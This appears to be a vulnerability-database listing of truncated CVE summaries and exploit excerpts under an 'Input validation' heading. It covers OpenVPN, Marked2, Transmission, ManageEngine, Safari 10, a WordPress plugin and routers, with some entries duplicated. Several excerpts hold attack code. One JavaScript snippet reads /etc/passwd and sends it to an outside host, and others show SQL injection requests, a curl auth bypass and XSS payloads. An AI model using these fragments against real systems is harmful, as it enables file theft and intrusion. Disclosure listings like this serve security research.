Input validation

DISPUTED A cross-protocol scripting issue was discovered in the management interface in OpenVPN through 2.4.5. When this interface is enabled over TCP without a password, and when no other clients are connected to this interface, attackers can execute arbitrary management commands, obtain sensiti...

CVE-2018-7544

Removed by vendor...

Marked2 - Local File Disclosure Vulnerability

Exploit for multiple platform in category local exploits var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new...

CVE-2018-6824

Cozy version 2 has XSS allowing remote attackers to obtain administrative access via JavaScript code in the url parameter to the /api/proxy URI, as demonstrated by an XMLHttpRequest call with an 'email:"[email protected]"' request, which can be followed by a password reset...

CVE-2018-6824

Cozy version 2 has XSS allowing remote attackers to obtain administrative access via JavaScript code in the url parameter to the /api/proxy URI, as demonstrated by an XMLHttpRequest call with an 'email:"[email protected]"' request, which can be followed by a password reset...

CVE-2018-6806

Marked 2 through 2.5.11 allows remote attackers to read arbitrary files via a crafted HTML document that triggers a redirect to an x-marked://preview?text= URL. The value of the text parameter can include arbitrary JavaScript code, e.g., making XMLHttpRequest calls...

CVE-2018-6806

Marked 2 through 2.5.11 allows remote attackers to read arbitrary files via a crafted HTML document that triggers a redirect to an x-marked://preview?text= URL. The value of the text parameter can include arbitrary JavaScript code, e.g., making XMLHttpRequest calls...

Marked2 - Local File Disclosure

Marked2 - Local File Disclosure var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest;...

Transmission - RPC DNS Rebinding Exploit

Exploit for multiple platform in category remote exploits The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to ...

RISE 1.9 - 'search' SQL Injection

Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 30/12/2017 CVE: CVE-2017-17999 Vendor Homepage: http://fairsketch.com/ Version: 1.9 POST /index.php/knowledgebase/getarticlesuggestion/ HTTP/1.1 Host: localhost...

Transmission - RPC DNS Rebinding

Transmission - RPC DNS Rebinding The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on...

Transmission - RPC DNS Rebinding

The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemo...

Samsung Internet Browser SOP Bypass

This module takes advantage of a Same-Origin Policy SOP bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up. Thi...

transmission-daemon -- vulnerable to dns rebinding attacks

Google Project Zero reports: The transmission bittorrent client uses a client/server architecture, the user interface is the client which communicates to the worker daemon using JSON RPC requests. As with all HTTP RPC schemes like this, any website can send requests to the daemon listening on...

ManageEngine Applications Manager 13 - SQL Injection

ManageEngine Applications Manager 13 - SQL Injection ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities. Proof of Concept 1 name= parameter is susceptible: POST /manageApplications.do?method=insert HTTP/1.1 Host: 192.168.1.190:9090...

Zoho ManageEngine Applications Manager 13 SQL Injection

ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities. Proof of Concept 1 name= parameter is susceptible: POST /manageApplications.do?method=insert HTTP/1.1 Host: 192.168.1.190:9090 User-Agent: Mozilla/5.0 Windows NT 10.0; WOW64;...

safari10跨域漏洞

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置httpheader 我交到苹果的bugreport，并给apple发邮件后，他们自己悄悄把漏洞修了，连个邮件都没给我发，所以我决定公开poc 这是我在漏洞未修复前截的图： 这个漏洞可以造成同源策略绕过，随便跨域，这是我写的获取gmail数据的代码： html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...

Student Result or Employee Database <= 1.6.3 - Auth Bypass

The Student Result or Employee Database WordPress plugin was affected by an Auth Bypass security vulnerability. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer:...

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting Exploit Title: XSS persistent on intelbras router with firmware WRN 250 Date: 07/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150Mbps - WRN 240 Tested on: kali linux, windows...

Technicolor TC7337 - SSID Persistent Cross-Site Scripting

Technicolor TC7337 - SSID Persistent Cross-Site Scripting // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//...